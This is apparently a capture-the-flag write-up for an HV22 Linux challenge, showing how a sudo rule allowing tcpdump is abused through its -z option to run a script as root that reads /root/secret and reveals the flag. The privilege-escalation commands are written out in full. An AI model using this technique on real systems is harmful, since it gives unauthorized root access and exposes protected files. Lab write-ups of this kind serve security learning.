Level: Medium
Author: wangibangi
Santa wrote his first small script, to track the open gifts on the wishlist. However the script stopped working a couple of days ago and Santa has been stuck debugging the script. His sysadmin seems to be a bit funny ;)
For this challenge, we are given a linux box with some restrictions. First, I checked the script mentioned in the description:
santa@f5125016-5627-46be-ae27-0a3de9e4010e:/home/santa> cat santa-script.sh
echo "$(date)" >> /var/log/wishlist.log
curl -k https://brick-steep-tower.glitch.me/api/wishlist/items | jq .[].name >> /var/log/wishlist.log
echo "---------" >> /var/log/wishlist.log
Seems like we have to check out /var/log/wishlist.log
cat: can't open '/var/log/wishlist.log': Permission denied
Okay, we need to get root access first to solve this challenge. To do this, I checked which binaries I could run with sudo:
santa@f5125016-5627-46be-ae27-0a3de9e4010e:/home/santa> sudo -l
Matching Defaults entries for santa on f5125016-5627-46be-ae27-0a3de9e4010e:
User santa may run the following commands on f5125016-5627-46be-ae27-0a3de9e4010e:
(root) NOPASSWD: /usr/bin/less /var/log/*
(root) NOPASSWD: !/usr/bin/less /var/log/*..*
(root) NOPASSWD: !/usr/bin/less /var/log/* *
(root) NOPASSWD: /usr/bin/tcpdump
seems to be an interesting binary that we can use to get root privileges. And of course there's a GTFOBin
entry. We can use the described exploit as follows:
First we write the following to a file tmp.sh
/bin/cat /root/secret/*
And then we can run:
sudo tcpdump -i eth0 -w /dev/null -W 1 -G 1 -z ./tmp.sh -Z root
To get the content of the secret folder: HV22{M4k3-M3-a-S4ndW1ch}